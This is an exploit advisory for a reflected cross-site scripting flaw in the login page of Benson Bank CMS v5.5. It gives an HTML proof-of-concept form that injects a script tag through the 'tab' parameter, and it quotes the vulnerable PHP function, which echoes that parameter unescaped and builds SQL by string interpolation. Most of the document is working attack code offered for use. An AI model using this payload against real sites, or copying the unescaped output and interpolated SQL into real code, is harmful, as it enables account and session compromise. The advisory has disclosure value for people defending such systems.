*=============================================================|
| Exploit Title: Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://topnew.net
|
| Download Link : http://downloads.sourceforge.net/sidu/bank55.zip
|
| Version : v 5.5 - 2015.09.09
|
| Tested on: Kali Linux
|
| Date: 1 /1 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD><TITLE>Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting</TITLE></HEAD>
|<BODY>
|<form action="http://127.0.0.1/7/bank55/login.php" method="get">
| <input type="hidden" name="tab" value="Login'"/><ScRiPt >alert('M.R.S.L.Y')</ScRiPt>"/>
|</form>
|</BODY>
|</HTML>
*=======================|
|Vulnerable code :
|
|function main($u, $p, $p1, $p2, $tab) {
| if ($u == 'logout') {
| global $pin;
| $u = $pin[0];
| if ($u) {
| cms_sql('update', 'bsb_account', null, null, "sid='$u.$u',updated='".date('Y-m-d H:i:s')."' where pid=$u");
| setcookie('BSB', '', time() - 1);
| }
| }
| $u = ceil($u); $p = trim($p);
| if ($u < 1) $u = '';
| if ($tab == 'Login' && $u && $p) {
| $err = valid_data_login($u, $p);
| if (!$err) return main_jump_login($u, $auto, $url);
| }
| uppe();
| $tabs = array('Login'=>lang(2505), 'Apply'=>lang(2507), 'PWD'=>lang(2506), 'Change'=>lang(2513));
| echo cms_form(), "<div style='max-width:400px;margin:0 auto'>";
| nav1_guest($tab);
| echo "<ul class='tab'>";
| if (!$tab) $tab = 'Login';
| foreach ($tabs as $k => $v) echo ($k == $tab ? "<li class='on'>$v</li>" : "<li><a href='login.php?tab=$k'>$v</a></li>");
| echo "</ul><div class='tab'>";
| if ($tab == 'Login') main_form_login($u, $p, $err);
| elseif ($tab == 'Apply') main_apply($u, $p, $p1);
| elseif ($tab == 'PWD') main_pwd($u);
| elseif ($tab == 'Change') main_change($u, $p, $p1, $p2);
| echo '</div></div></form>';
| down();
| }
|
*=============================================================|
| Discovered By : M.R.S.L.Y
*=============================================================|